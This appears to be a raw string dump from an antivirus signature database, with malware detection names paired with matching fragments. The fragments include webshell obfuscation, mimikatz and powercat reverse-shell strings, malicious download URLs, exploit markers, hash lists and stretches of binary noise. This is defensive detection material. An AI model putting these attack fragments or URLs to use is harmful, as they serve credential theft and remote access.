)K!!#SCPT:Trojan:Linux/CoinMiner.JJ2 pgrep-fmonerohash|xargskill-9 !!#SCPT:Trojan:VBS/CoinMiner.A!ab3 )K!!#SCPT:Trojan:VBS/CoinMiner.A!ab3 objwmi.execquery(\" p\").count !!#SCPT:Trojan:VBS/Obfuse.DRB1!MTB )K!!#SCPT:Trojan:VBS/Obfuse.DRB1!MTB strreverse(\"==ai\"+\"layxguci\") !!#SCPT:TrojanSpy:JS/BrobanDel.A13 )K!!#SCPT:TrojanSpy:JS/BrobanDel.A13 /^([1-9]*)[0]*([1-9][ d]*)/ !!#SCPT:VBSCUpdateSystemParameters )K!!#SCPT:VBSCUpdateSystemParameters updateperusersystemparameters !!#SCPT:VirTool:JS/Obfuscator.HJ.2 )K!!#SCPT:VirTool:JS/Obfuscator.HJ.2 ,0,0);};}catch(er){};}; !!#SCRIPT:BAT/TechWindowMaximize.A )K!!#SCRIPT:BAT/TechWindowMaximize.A echowindowstate=\"maximize\"/^> !!#SCRIPT:PowerShell/Macroburst.H3 )K!!#SCRIPT:PowerShell/Macroburst.H3 get-azureadcurrentsessioninfo !!#SCRIPT:Worm:ALisp/Blemfox.C!srv )K!!#SCRIPT:Worm:ALisp/Blemfox.C!srv princ-yjfwqusmtp.qq.com[princ !!#TEL:Backdoor:PHP/Webshell.P!vc1 )K!!#TEL:Backdoor:PHP/Webshell.P!vc1 ('w'.'scr'.'ip'.'t.she'.'ll') !!#TEL:Backdoor:PHP/Webshell.P!vc2 )K!!#TEL:Backdoor:PHP/Webshell.P!vc2 exploit:breakfuckingsafe-mode !!#Trojan:Win32/AgentTesla.QA4!MTB )K!!#Trojan:Win32/AgentTesla.QA4!MTB execute(\"chrw(- \"!#ALF:Exploit:Script/Hathler.G!dha )K\"!#ALF:Exploit:Script/Hathler.G!dha mstscexpl*me=newmstscexpl(); \"!#SCPT:AutoItMacro_LocalAppDataDir )K\"!#SCPT:AutoItMacro_LocalAppDataDir @localappdatadir \"!#SCPT:AutoItMacro_ProgramFilesDir )K\"!#SCPT:AutoItMacro_ProgramFilesDir @programfilesdir \"!#SCPT:AutoItMacro_TrayIconVisible )K\"!#SCPT:AutoItMacro_TrayIconVisible @trayiconvisible )K\"!#SCPT:Exploit:Win32/ShellCode.Y.1 1158b9 0-9a-f000049803408 \"!#SCPT:JS/Nemucod.Undefined2xStart )K\"!#SCPT:JS/Nemucod.Undefined2xStart ()[['undefined','undefined', \"!#SCPT:JS/Obfuscator.Hex.Replace.A )K\"!#SCPT:JS/Obfuscator.Hex.Replace.A \\x72\\x65\\x70\\x6c\\x61\\x63\\x65 \"!#SCRIPT:PowerShell/Internaloff.D3 )K\"!#SCRIPT:PowerShell/Internaloff.D3 get-accesstokenusingaadgraph \"!#SCRIPT:PowerShell/RegistryHive.A )K\"!#SCRIPT:PowerShell/RegistryHive.A microsoft.win32.registryhive \"!#SCRIPT:Trojan:JS/Kilim!FB_MalUrl )K\"!#SCRIPT:Trojan:JS/Kilim!FB_MalUrl hizliservis.pw/php/askfm.php redbayi.com/winatom/user.php \"!#SCRIPT:Trojan:MSIL/Moloterae!lnk )K\"!#SCRIPT:Trojan:MSIL/Moloterae!lnk .nattly.com chrome.exewww \"!#TrojanDownloader:JS/Genbhv.C!vc2 )K\"!#TrojanDownloader:JS/Genbhv.C!vc2 gasstove(monkeyb(jiepak(null \"!#TrojanDownloader:VBS/Obfus.A!al1 )K\"!#TrojanDownloader:VBS/Obfus.A!al1 cmd/c%tmp%\\avantfirewall.exe #!#ALF:Trojan:PHP/Dirtelti.BTR07!mtb )K#!#ALF:Trojan:PHP/Dirtelti.BTR07!mtb require request[ <?php <?php #!#Exploit:O97M/CVE-2017-8570.Gatb02 )K#!#Exploit:O97M/CVE-2017-8570.Gatb02 }}}numbernfigureversionhigh #!#SCPT:AutoItApi_GetSystemDEPPolicy )K#!#SCPT:AutoItApi_GetSystemDEPPolicy _winapi_getsystemdeppolicy( #!#SCPT:Backdoor:ASP/Dirtelti.J1!MTB )K#!#SCPT:Backdoor:ASP/Dirtelti.J1!MTB webadmin2.xfinalisawebshell #!#SCPT:Backdoor:PHP/Nishang.B!ns004 )K#!#SCPT:Backdoor:PHP/Nishang.B!ns004 .synopsisnishangscriptwhich #!#SCPT:JS/Obfuscator.Array.Concat.A )K#!#SCPT:JS/Obfuscator.Array.Concat.A [0][0]+ #!#SCPT:JS/Obfuscator.Split.charat.A )K#!#SCPT:JS/Obfuscator.Split.charat.A ch\"+\"a #!#SCPT:TrojanDownloader:JS/Tnega.L4 )K#!#SCPT:TrojanDownloader:JS/Tnega.L4 .getruntime().exec( )K#!#SCRIPT:Worm:Win32/Gamarue.gen!lnk ,_ldr@16desktop.inirettls\"\" #!#TELPER:Exploit:O97M/CVE-2017-8759 )K#!#TELPER:Exploit:O97M/CVE-2017-8759 {\\object\\objlink\\objupdate\\ {\\object\\objupdate\\objlink\\ #!#TrojanDownloader:O97M/Slinjek.MR1 )K#!#TrojanDownloader:O97M/Slinjek.MR1 s^et/p=\"\"gundem.com/cat.php )K#!#TrojanDownloader:Win32/Lnkget.gen .vbs> .bat&echostart $!#Exploit:O97M/DDEDownloader.J!atob5 )K$!#Exploit:O97M/DDEDownloader.J!atob5 <w:instrtext>.exe\"http://< $!#SCPT:Backdoor:PHP/Webshell.S!al001 )K$!#SCPT:Backdoor:PHP/Webshell.S!al001 $hhc=\"$hhcpath\"+\"\\hhc.exe\" $!#SCPT:CodeOnly.RpivotClientServer.C )K$!#SCPT:CodeOnly.RpivotClientServer.C socks_server_reply_success $!#SCPT:Obfuscator.LongVariableName.A )K$!#SCPT:Obfuscator.LongVariableName.A a-z0-9=\" $!#SCPT:Trojan:JS/WmiCreateProc.B!ams )K$!#SCPT:Trojan:JS/WmiCreateProc.B!ams $!#Script:Phish:PHP/PhishBank.AD2!MTB )K$!#Script:Phish:PHP/PhishBank.AD2!MTB [base64_decode('zmlszq==') $!#Script:Trojan:JS/SpelevoEK.AD!MTB4 )K$!#Script:Trojan:JS/SpelevoEK.AD!MTB4 functioncheckversionflash( $!#Trojan:PowerShell/CoinMiner.B!ptb4 )K$!#Trojan:PowerShell/CoinMiner.B!ptb4 cmd/cschtasks/delete/f/tn\\ $!#TrojanDownloader:VBS/Agent.RX3!MTB )K$!#TrojanDownloader:VBS/Agent.RX3!MTB chr(37)\"app\"\"data\"chr(37)\" %!#BRUTE:Exploit:Java/CVE-2008-5353.C3 )K%!#BRUTE:Exploit:Java/CVE-2008-5353.C3 java/io/objectinputstream %!#Exploit:O97M/CVE-2017-11882.AC!ats2 )K%!#Exploit:O97M/CVE-2017-11882.AC!ats2 winexecsjm$$rexitprocesss %!#Exploit:O97M/CVE-2017-11882.X!smk01 )K%!#Exploit:O97M/CVE-2017-11882.X!smk01 vuhttp://bit.ly/ %!#SCPT:AutoItApi_WinNet_AddConnection )K%!#SCPT:AutoItApi_WinNet_AddConnection _winnet_addconnection %!#SCPT:Backdoor:HTML/PoisonTap!listen )K%!#SCPT:Backdoor:HTML/PoisonTap!listen server.listen @poisontap %!#SCPT:Exploit:O97M/CVE-2017-0199.JF2 )K%!#SCPT:Exploit:O97M/CVE-2017-0199.JF2 urihttps://bit.ly/3kvdcmi %!#SCPT:JS/Obfuscator.Split.response.A )K%!#SCPT:JS/Obfuscator.Split.response.A .respon\"+\"s %!#SCPT:SchTaskNetworkServiceAccntPriv )K%!#SCPT:SchTaskNetworkServiceAccntPriv <userid>s-1-5-20</userid> %!#SCPT:XML/MaliciousLink.TopLevelFile )K%!#SCPT:XML/MaliciousLink.TopLevelFile http://d.xmapps.net/i.php %!#SCRIPT:Exploit:JS/CVE-2013-2551.D-3 )K%!#SCRIPT:Exploit:JS/CVE-2013-2551.D-3 6?'%8d%76%04':'%90%90%90' %!#SCRIPT:PowerShell/DllImportKernel32 )K%!#SCRIPT:PowerShell/DllImportKernel32 dllimport( %!#SCRIPT:PowerShell/DllImportNetapi32 )K%!#SCRIPT:PowerShell/DllImportNetapi32 netapi32.dll )K%!#SCRIPT:PowerShell/Mimikittenz.A!dev user=.{1,50}&pass=.{1,50} %!#SCRIPT:VirTool:Win32/AutInject.AL_3 )K%!#SCRIPT:VirTool:Win32/AutInject.AL_3 fileread(@tempdir&\"\\f.txt &!#Exploit:O97M/CVE-2017-11882.AB!atob6 )K&!#Exploit:O97M/CVE-2017-11882.AB!atob6 550072006c004d006f006e00 &!#Exploit:O97M/CVE-2017-11882.AG!ats02 )K&!#Exploit:O97M/CVE-2017-11882.AG!ats02 rtf\\object\\ 0\\198923813 )K&!#SCPT:Exploit:JS/Blacole.fromcharcode +=string[\"fromcharcode\"] &!#SCPT:Phish:PHP/Urlpat_Rand13I )K&!#SCPT:Phish:PHP/Urlpat_Rand13I f64d08308082ad26be60767 a0e9f5d64349fb13191bc781f81f42e1:f176ba63b4d68e576b5ba345bec2c7b7 Ba0e9f5d64349fb13191bc781f81f42e1:f176ba63b4d68e576b5ba345bec2c7b7 d0ec4b50a944b182fc10ff51f883ccf7:ae4edc6faf64d08308082ad26be60767 Bd0ec4b50a944b182fc10ff51f883ccf7:ae4edc6faf64d08308082ad26be60767 294b2f1dc22c6e6c3231d2fe311d504b:ae4edc6faf64d08308082ad26be60767 B294b2f1dc22c6e6c3231d2fe311d504b:ae4edc6faf64d08308082ad26be60767 a0e9f5d64349fb13191bc781f81f42e1:e35df3e00ca4ef31d42b34bebaa2f86e Ba0e9f5d64349fb13191bc781f81f42e1:e35df3e00ca4ef31d42b34bebaa2f86e a0e9f5d64349fb13191bc781f81f42e1:fd4bc6cea4877646ccd62f0792ec0b62 Ba0e9f5d64349fb13191bc781f81f42e1:fd4bc6cea4877646ccd62f0792ec0b62 a0e9f5d64349fb13191bc781f81f42e1:46e8c907c5cc3cf4b4420e76da5b4dba Ba0e9f5d64349fb13191bc781f81f42e1:46e8c907c5cc3cf4b4420e76da5b4dba a0e9f5d64349fb13191bc781f81f42e1:b31c0b82752ea0e2c48b8ce46e9263e5 Ba0e9f5d64349fb13191bc781f81f42e1:b31c0b82752ea0e2c48b8ce46e9263e5 72a589da586844d7f0818ce684948eea:fd4bc6cea4877646ccd62f0792ec0b62 B72a589da586844d7f0818ce684948eea:fd4bc6cea4877646ccd62f0792ec0b62 a0e9f5d64349fb13191bc781f81f42e1:6d6b821affda5de6562d217770a7ead0 Ba0e9f5d64349fb13191bc781f81f42e1:6d6b821affda5de6562d217770a7ead0 a0e9f5d64349fb13191bc781f81f42e1:567bb420d39046dbfd1f68b558d86382 Ba0e9f5d64349fb13191bc781f81f42e1:567bb420d39046dbfd1f68b558d86382 a0e9f5d64349fb13191bc781f81f42e1:ec74a5c51106f0419184d0dd08fb05bc Ba0e9f5d64349fb13191bc781f81f42e1:ec74a5c51106f0419184d0dd08fb05bc 51c64c77e60f3980eea90869b68c58a8:ae4edc6faf64d08308082ad26be60767 B51c64c77e60f3980eea90869b68c58a8:ae4edc6faf64d08308082ad26be60767 72a589da586844d7f0818ce684948eea:8cb68dc6ad0365d44af24b254ef70844 B72a589da586844d7f0818ce684948eea:8cb68dc6ad0365d44af24b254ef70844 a0e9f5d64349fb13191bc781f81f42e1:b7bd51222a09f3ad66a340710ae9c01a Ba0e9f5d64349fb13191bc781f81f42e1:b7bd51222a09f3ad66a340710ae9c01a a0e9f5d64349fb13191bc781f81f42e1:8cb68dc6ad0365d44af24b254ef70844 Ba0e9f5d64349fb13191bc781f81f42e1:8cb68dc6ad0365d44af24b254ef70844 d0ec4b50a944b182fc10ff51f883ccf7:b31c0b82752ea0e2c48b8ce46e9263e5 Bd0ec4b50a944b182fc10ff51f883ccf7:b31c0b82752ea0e2c48b8ce46e9263e5 ce5f3254611a8c095a3d821d44539877:ae4edc6faf64d08308082ad26be60767 Bce5f3254611a8c095a3d821d44539877:ae4edc6faf64d08308082ad26be60767 d0ec4b50a944b182fc10ff51f883ccf7:758945630046fd37070521b8544d1fe8 Bd0ec4b50a944b182fc10ff51f883ccf7:758945630046fd37070521b8544d1fe8 8916410db85077a5460817142dcbc8de:ae4edc6faf64d08308082ad26be60767 B8916410db85077a5460817142dcbc8de:ae4edc6faf64d08308082ad26be60767 a0e9f5d64349fb13191bc781f81f42e1:394441ab65754e2207b1e1b457b3641d Ba0e9f5d64349fb13191bc781f81f42e1:394441ab65754e2207b1e1b457b3641d 72a589da586844d7f0818ce684948eea:1af33e1657631357c73119488045302c B72a589da586844d7f0818ce684948eea:1af33e1657631357c73119488045302c a0e9f5d64349fb13191bc781f81f42e1:ccc514751b175866924439bdbb5bba34 Ba0e9f5d64349fb13191bc781f81f42e1:ccc514751b175866924439bdbb5bba34 a0e9f5d64349fb13191bc781f81f42e1:beb7069ae409bccfed702c17ad004223 Ba0e9f5d64349fb13191bc781f81f42e1:beb7069ae409bccfed702c17ad004223 1770c51ee209c73547f5e53e366b6152:46e8c907c5cc3cf4b4420e76da5b4dba B1770c51ee209c73547f5e53e366b6152:46e8c907c5cc3cf4b4420e76da5b4dba a0e9f5d64349fb13191bc781f81f42e1:1af33e1657631357c73119488045302c Ba0e9f5d64349fb13191bc781f81f42e1:1af33e1657631357c73119488045302c 51c64c77e60f3980eea90869b68c58a8:1af33e1657631357c73119488045302c B51c64c77e60f3980eea90869b68c58a8:1af33e1657631357c73119488045302c d0ec4b50a944b182fc10ff51f883ccf7:f176ba63b4d68e576b5ba345bec2c7b7 Bd0ec4b50a944b182fc10ff51f883ccf7:f176ba63b4d68e576b5ba345bec2c7b7 d0ec4b50a944b182fc10ff51f883ccf7:fd4bc6cea4877646ccd62f0792ec0b62 Bd0ec4b50a944b182fc10ff51f883ccf7:fd4bc6cea4877646ccd62f0792ec0b62 8916410db85077a5460817142dcbc8de:fd4bc6cea4877646ccd62f0792ec0b62 B8916410db85077a5460817142dcbc8de:fd4bc6cea4877646ccd62f0792ec0b62 c35a61411ee5bdf666b4d64b05c29e64:ae4edc6faf64d08308082ad26be60767 Bc35a61411ee5bdf666b4d64b05c29e64:ae4edc6faf64d08308082ad26be60767 5f0b3b316fe5f ? 5f0b3b316fe5fIncludesResearchData runservices runservicesonce explorer_run winlogon_shell winlogon_userinit winlogon_load winlogon_notify T1547.004 normalize_unicode tasks_actions T1053.002 :persistence_target :sourcefilename_ :sourceppid_ RegistryValueDataToFilePersistContext.A (RegistryValueDataToFilePersistContext.A appendFilePersistContextFromList !appendFilePersistContextFromList persistence_source \\reg.exe \t\\reg.exe \\regedit.exe \\syswow64\\services.exe :persistence_source appendNotExistingFilePersistContext $appendNotExistingFilePersistContext !#SLF:SimToolLaunch.F githubusercontent /atomic-red !#SLF:SimToolLaunch.D .picus.agent.service.exe \\picus agent\\ !#SLF:SimToolLaunch.E api/monkey/download/monkey !#SLF:SimToolLaunch.C 6attackiq\\firedrillagent.exe 2\\attackiq\\firedrillagent\\ !#ALF:Trojan:Win32/DefenderControl.B /SYS 1 /TI 1 vtxtseg.exe $amivoicerewriter !#SLF:SimToolLaunch.A .sbsimulator_service.exe sbsimulator.exe \\sbsimulation cmd.exe /c echo sb_ windows\\temp\\sb-sim- !#SLF:SimToolLaunch.B 2cymulatefiledecryptor.exe >cymulateedrscenarioexecutor.exe \"cymulateagent.exe (cymulateelevated.exe &redteamexecutor.exe 0cymulateagentupdater.exe *cymulate\\edr_attacks\\ !#TEL:Win32/SuspPsExecProc.B .exe $\\Windows Defender\\ \\Program Files\\ (\\Windows\\SystemApps\\ $\\Microsoft Office\\ :\\Windows\\System32\\svchost.exe J\\Windows\\System32\\CompatTelRunner.exe :\\Windows\\System32\\dllhost.exe P\\Windows\\System32\\SearchProtocolHost.exe P\\Windows\\System32\\SecurityHealthHost.exe 4\\Windows\\System32\\WerFault :\\Windows\\System32\\conhost.exe >\\Windows\\System32\\taskhostw.exe *\\TrustedInstaller.exe \\mscorsvw.exe !#BM_MT1055 !#BM_MT1083 !#BM_MT1057 !#ALF:AMSI2:ML:Ps:90 !#ALF:AMSI2:ML:Ps:95 !#ALF:ASR:ESRP_EneIo !#BM_XSL_FILE !#BM_MT1036.005 !#ALF:AMSI2:ML:Wmi:60 !#ALF:AMSI2:ML:Wmi:70 !#BM_MT1003.003:ntdsexfil !#BM_MT1570 !#ALF:ASR:ESRP_lha !#ALF:ASR:ESRP_Dbutil !#ALF:ASR:ESRP_RTCore64 !#ALF:ASR:ESRP_gmer !#ALF:ASR:ESRP_EneTechIo !#BM_MT1049:network_discovery !#BM_MT1074:datastage !#ALF:ASR:ESRP_DirectIO64 !#ALF:ASR:ESRP_smamp !#ALF:ASR:ESRP_atszio !#ALF:ASR:ESRP_iqvw64 !#ALF:ASR:ESRP_ssport !#ALF:ASR:ESRP_viragt !#ALF:ASR:ESRP_bsmi_asr !#ALF:ASR:ESRP_cpuz_asr !#ALF:ASR:ESRP_elby_asr !#ALF:ASR:ESRP_gdrv_asr !#ALF:ASR:ESRP_nicm_asr !#ALF:ASR:ESRP_nscm_asr !#BM_MT1570:remote_exedrop !#ALF:ASR:ESRP_mtcbsv64 !#ALF:ASR:ESRP_viragt64 !#ALF:ASR:ESRP_winring0 !#ALF:ASR:ESRP_sandra_asr !#BM_MT1497:SandboxEvasion !#BM_MT1547.001 (!#BM_MT1547.001 !#ALF:ExecDownWrd.J!ibt !#ALF:ExecDownWrd.J!ibt !#ALF:AGGR:E5.Mampa:50!ml !#ALF:AGGR:E5.Mampa:60!ml !#ALF:AGGR:E5.Mampa:70!ml !#ALF:AGGR:E5.Mampa:80!ml !#ALF:AGGR:E5.Mampa:90!ml !#ALF:AGGR:E5.Mampa:95!ml !#ALF:AGGR:E5.Mampa:99!ml !#BM_MT1104:command_control_ps !#BM_MT1003.001:credentialdumping !#ALF:ASR:ESRP_physmem \"!#ALF:ASR:ESRP_physmem !#ALF:ASR:ESRP_libnicm_asr !#ALF:ASR:ESRP_ntiolib_asr !#ALF:ASR:ESRP_rtkio64_asr !#ALF:Exploit:UEFI/Drangoot.G1w !#BM_MT1105:ingress_tool !!#BM_MT1105:ingress_tool !#BM_MT1570:remote_scriptdrop !#ALF:ASR:ESRP_speedfan_asr !#ALF:OfcWrdPress.J!ibt $!#ALF:OfcWrdPress.J!ibt !#BM_MT1033:user_disovery $!#BM_MT1033:user_disovery !#BM_MT1053.005:schtask_macro !#BM_MT1012:registry_discovery !#ALF:AGGR:E5.OpclCl:80!ml $!#ALF:AGGR:E5.OpclCl:80!ml !#ALF:AGGR:E5.OpclCl:90!ml $!#ALF:AGGR:E5.OpclCl:90!ml !#ALF:AGGR:E5.OpclCl:95!ml $!#ALF:AGGR:E5.OpclCl:95!ml !#ALF:AGGR:E5.OpclCl:99!ml $!#ALF:AGGR:E5.OpclCl:99!ml !#ALF:ASR:ESRP_biostar_io_asr !!#ALF:ASR:ESRP_biostar_io_asr !#ALF:ASR:ESRP_bs_hwmio64_asr !!#ALF:ASR:ESRP_bs_hwmio64_asr !#ALF:ASR:ESRP_rtkiow8x64_asr !!#ALF:ASR:ESRP_rtkiow8x64_asr !#BM_MT1010:app_discovery &!#BM_MT1010:app_discovery !#BM_MT1069:perm_discovery %!#BM_MT1069:perm_discovery !#ALF:ASR:ESRP_powertool_asr #!#ALF:ASR:ESRP_powertool_asr !#BM_MT1071.001:posh_webaccess !!#BM_MT1071.001:posh_webaccess !#BM_MT1033:user_discovery &!#BM_MT1033:user_discovery !#BM_MT1083:file_discovery &!#BM_MT1083:file_discovery !#ALF:ASR:ESRP_ProcessHacker $!#ALF:ASR:ESRP_ProcessHacker !#ALF:ASR:ESRP_rtkiow10x64_asr \"!#ALF:ASR:ESRP_rtkiow10x64_asr '!#BM_MT1083:file_discovery %!#BM_MT1082:system_discovery !#ALF:Exploit:UEFI/Drangoot.G2w #!#ALF:Exploit:UEFI/Drangoot.G2w 3!#BM_MT1036.005 !#BM_MT1007:system_discovery &!#BM_MT1007:system_discovery !#BM_MT1016:network_discovery %!#BM_MT1016:network_discovery !#ALF:ASR:ESRP_kernelbridge_asr #!#ALF:ASR:ESRP_kernelbridge_asr !#ALF:ASR:ESRP_nchgbios2x64_asr #!#ALF:ASR:ESRP_nchgbios2x64_asr !#ALF:ASR:ESRP_segwindrvx64_asr #!#ALF:ASR:ESRP_segwindrvx64_asr !#ALF:AGGR:E5.Webmail.Macro (!#ALF:AGGR:E5.Webmail.Macro &!#BM_MT1049:network_discovery !#BM_MT1057:process_discovery &!#BM_MT1057:process_discovery !#BM_MT1016 9!#BM_MT1016 !#BM_MT1543.003:svc_creation_scpt H!#!#BM_MT1543.003:svc_creation_scpt !#BM_MT1016:networkconfig_discovery H#!!#BM_MT1016:networkconfig_discovery !#BM_MT1120:device_discovery )!#BM_MT1120:device_discovery !#BM_MT1087.002:user_discovery '!#BM_MT1087.002:user_discovery !#BM_MT1518.001:system_discovery I %!#BM_MT1518.001:system_discovery !#BM_XSLJSCRIPT_FILE 2!#BM_XSLJSCRIPT_FILE !#ALF:ASR:ESRP_amdryzenmaster_asr J!%!#ALF:ASR:ESRP_amdryzenmaster_asr !#BM_MT1135:network_discovery *!#BM_MT1135:network_discovery !#BM_XSLVBSCRIPT_FILE 3!#BM_XSLVBSCRIPT_FILE !#BM_MT1087.001:user_discovery *!#BM_MT1087.001:user_discovery !#BM_MT1140:obfuscation_xor .!#BM_MT1140:obfuscation_xor !#ALF:Exploit:UEFI/Drangoot.GT ,!#ALF:Exploit:UEFI/Drangoot.GT !#BM_MT1569.002:svc_binary 1!#BM_MT1569.002:svc_binary !#BM_MT1140:obfuscation_js 2!#BM_MT1140:obfuscation_js !#BM_MT1201:passwordpolicy_discovery P$(!#BM_MT1201:passwordpolicy_discovery ?!#BM_MT1036.005 !#ALF:Trojan/JsRunkey.A 9!#ALF:Trojan/JsRunkey.A !#ALF:AGGR:E5.Email.Macro 8!#ALF:AGGR:E5.Email.Macro !#ALF:Trojan/VbsRunkey.A :!#ALF:Trojan/VbsRunkey.A !#SLF:PowerShell/NetUserAdd.A 5!#SLF:PowerShell/NetUserAdd.A !#ALF:Trojan/EncodedIEX!amsi.A 4!#ALF:Trojan/EncodedIEX!amsi.A !#ALF:Trojan/PsRunkey.A <!#ALF:Trojan/PsRunkey.A !#SLF:PowerShell/DiscoveryBiosVer.A W#0!#SLF:PowerShell/DiscoveryBiosVer.A !#BM_MT1140:obfuscation_b64 9!#BM_MT1140:obfuscation_b64 !#SLF:IntentToInject B!#SLF:IntentToInject ;!#BM_MT1082:system_discovery !#ALF:AGGR:TobeetJs:20!ml ?!#ALF:AGGR:TobeetJs:20!ml !#ALF:AGGR:TobeetJs:30!ml ?!#ALF:AGGR:TobeetJs:30!ml !#ALF:AGGR:TobeetJs:40!ml ?!#ALF:AGGR:TobeetJs:40!ml !#ALF:AGGR:TobeetJs:50!ml ?!#ALF:AGGR:TobeetJs:50!ml !#ALF:AGGR:TobeetJs:60!ml ?!#ALF:AGGR:TobeetJs:60!ml !#SLF:PowerShell/DiscoveryDeviceInfo.A ]&3!#SLF:PowerShell/DiscoveryDeviceInfo.A !#SLF:PowerShell/DiscoverySystemInfo.A ]&3!#SLF:PowerShell/DiscoverySystemInfo.A !#SLF:PowerShell/DiscoverySystemPath.A ]&3!#SLF:PowerShell/DiscoverySystemPath.A k0Z^l ?\\~w2 C#9kv lmp]ERg rVoh~l D>U_~ N45T9 c&g1r X'n`O pV }$ rC0NPE O67yI Ol-=h S/\\>[ mpA,} vqjcy1Ld _T5Th c} o^F{L aah[t{a ML8L*& 8HC#'y CI '0Jh)$ !?+,47` ;%f#4_ SaG{t' UMTi7 W).wrsH FH@:W I*8n=G 1AoXv 2#FYr 2#FYr^1 j9w!k u.3!H] U\\yX\\ N},4! :[-xAD \\Uy=pt By|]] H 1Zo JrBC : {ra3* tM&e, ]StQ' k+Zbs IWFK8 /;vJH: A88 1 \"XX\tH paOvl >f2\tIb` XytPc; ,M&:oH jwsPb- wf;m}YIk xN?[Y kWG\">N Igl35 \\O,8su 9Or\tR 1\tvW\"m ?#?dF g^Dcm ? IF0 /Qc4t RB/'w/ JGy#Z) iis_exch_childproc 41b3f6330680 41b3f6330680IncludesResearchData )EF@ webshell_parent T1505.003 webshell_childproc 4bb3f224cd3e 4bb3f224cd3eIncludesResearchData )EF@ 73d74deadff2 73d74deadff2IncludesResearchData IsTechniqueObservedForPid iis_exch_web bad7d9fa74d6 bad7d9fa74d6IncludesResearchData 4fd7f19945f5 4fd7f19945f5IncludesResearchData \tw3wp.exe -ap \"sharepoint 2e0d7742402b1 2e0d7742402b1IncludesResearchData -ap \"msexchangeecpapppool\" -ap \"msexchangeowaapppool\" -ap \"msexchangeoabapppool\" 41b341ec33ee 41b341ec33eeIncludesResearchData WEF@ 51b3966a3dba 51b3966a3dbaIncludesResearchData cvtres.exe !#TEL:Trojan:Win32/WebShellDrop.A !#TEL:Trojan:Win32/WebShellDrop.AObMpAttributes %ExchangeInstallPath% %windir%\\system32\\inetsrv\\config\\applicationHost.config 8%windir%\\system32\\inetsrv\\config\\applicationHost.config ClientAccess\\OAB\\Temp\\ %SystemDrive%\\inetpub\\wwwroot GetIisInstallPaths Pathz :#Lowfi:LUA:PowershellDropsNewPEInAppDataPath.A!ent !#PUA:Blocked:OnDemEntPUA:NonAppPath&(Lua:GenericNonRtpN__|Lua:GenericNonRtpNH_|Lua:GenericNonRtpNHP|Lua:GenericNonRtpN_P) d!#PUA:Blocked:OnDemEntPUA:NonAppPath&(Lua:GenericNonRtpN__|Lua:GenericNonRtpNH_|Lua:GenericNonRtpNHP|Lua:GenericNonRtpN_P) !#Lua:IsEnterprise Z!#Lua:IsEnterprise !#IsEnterprise.Func a7b3cb2afd25 a7b3cb2afd25IncludesResearchData !#PUA:NonAppPath 59b3a4a744e8 2a1b36fa4b03e 137b3d7105a3e 9fb3c6115afe 9fb3c6115afeIncludesBMLuaLib,ResearchData 85b3a4c470c9 \\windows\\ltsvc\\ CONTEXT:PUA:SIM:InstallContextMet \"CONTEXT:PUA:SIM:InstallContextMet PUA:Sim:Blocked:Certificates PUA:Sim:Blocked:Specific !#SLF:AGGR:EX.ContextPECRoot &!#SLF:AGGR:EX.ContextPECRoot !#SLF:AGGR:EX.ContextPEAdminShare P!+!#SLF:AGGR:EX.ContextPEAdminShare invoke-mimikatz '!#SCRIPT:Trojan:PowerShell/RedPowdump.A '6'!#SCRIPT:Trojan:PowerShell/RedPowdump.A '!#SCRIPT:Trojan:PowerShell/RedPowdump.B '6'!#SCRIPT:Trojan:PowerShell/RedPowdump.B '!#SCRIPT:Trojan:PowerShell/RedPowdump.C '6'!#SCRIPT:Trojan:PowerShell/RedPowdump.C (!#SCRIPT:Backdoor:PowerShell/RedPowcat.A )}(!#SCRIPT:Backdoor:PowerShell/RedPowcat.A ('host','bytes','string')][alias(\"outputtype\")][string]$o=\"host\",[alias( J('host','bytes','string')][alias(\"outputtype\")][string]$o=\"host\",[alias( [-cor-l][-pport][options]-c<ip>clientmode.providetheipofthesystemyouwishtoconnectto. V[-cor-l][-pport][options]-c<ip>clientmode.providetheipofthesystemyouwishtoconnectto. :#LowFiPEEXEHasIOAVURLMSFT :#LowFiPEEXEHasIOAVURLMSFTU\" Y#PERSIST_PEEXEHasIOAVURLMSFT Y#PERSIST_PEEXEHasIOAVURLMSFTU*3 0b_#LowFi:ATTR:HSTR/MSBrowserPolicyMSFT 0b_#LowFi:ATTR:HSTR/MSBrowserPolicyMSFTa; !#LowfiInterestingCert TecSystem Ltd. Sofia Sofiaa| !#TELPER:Trojan:Win32/OneHuntImplant.B!dha FMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727) FMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)a !#TELPER:RemoteAccess:Win32/Kaseya Kaseya::Utility:: Kaseya::RemoteControl:: Kaseya::Net:: Kaseya::IO:: Kaseya.Application. Kaseya.RemoteControl. KaseyaRemoteControlHost. KaseyaAgent KaseyaD.ini \\VxD\\Kaseya \\Kaseya\\Agent KServer KServergA *!#STATIC:Dummy_MSFT_Internal_Test_Sig_OnlygA 'j?*!#STATIC:Dummy_MSFT_Internal_Test_Sig_OnlygA *!#STATIC:Dummy_MSFT_Internal_Test_Sig_OnlylF \"!#TELPER:RemoteAccess:Win32/KaseyalF \"!#TELPER:RemoteAccess:Win32/KaseyalI %!#TELPER:Trojan:Win32/OneHuntCert!dhalK '!#TELPER:Trojan:Win32/OneHuntCert.B!dhax9 !#PUA:Torrent:BitComet \\BitComet\\app\\Release_ \\BitComet\\app\\Release_x< !#ALF:Torrent:BitLord Codicit Setupx= !#PUA:Torrent:FlashGet :\\Flashget\\project\\client\\ :\\Flashget\\project\\client\\xA !#PUA:Torrent:Torch \\Release\\initialexe\\torch.exe.pdb \\Release\\initialexe\\torch.exe.pdbxE !#PUA:Torrent:WebTorrent WebTorrent, LLCxG !#PUA:Torrent:Tixati ersion\\Uninstall\\tixati \\Tixati.lnk \\Tixati.lnkxI !#PUA:Torrent:Thunder \\pdb\\Product_Release\\ThunderInstall.pdb \\pdb\\Product_Release\\ThunderInstall.pdbxJ !#ALF:Torrent:LibTorrent @libtorrent@@AAUrootdevice@12@H@_mfi@ @libtorrent@@AAUrootdevice@12@H@_mfi@xO !#ALF:Torrent:ABC [ Yet Another Bittorrent Client ] \\ABC\\ABC.lnk \\ABC\\ABC.lnkxQ !#PUA:Torrent:Diluge Deluge Bittorrent ClientxU !#PUA:Torrent:BitTorrent adaware\" BitTorrentxX !#PUA:Torrent:Miro Startup the Miro downloader process Miro_Downloader.py Miro_Downloader.pyxY !#PUA:Torrent:Vuze .vuze.com/files Vuze Installer might already be running Vuze Installer might already be runningxv !#PUA:Torrent:QBitTorrent .qbittorrent.org qBittorrent (required)xw 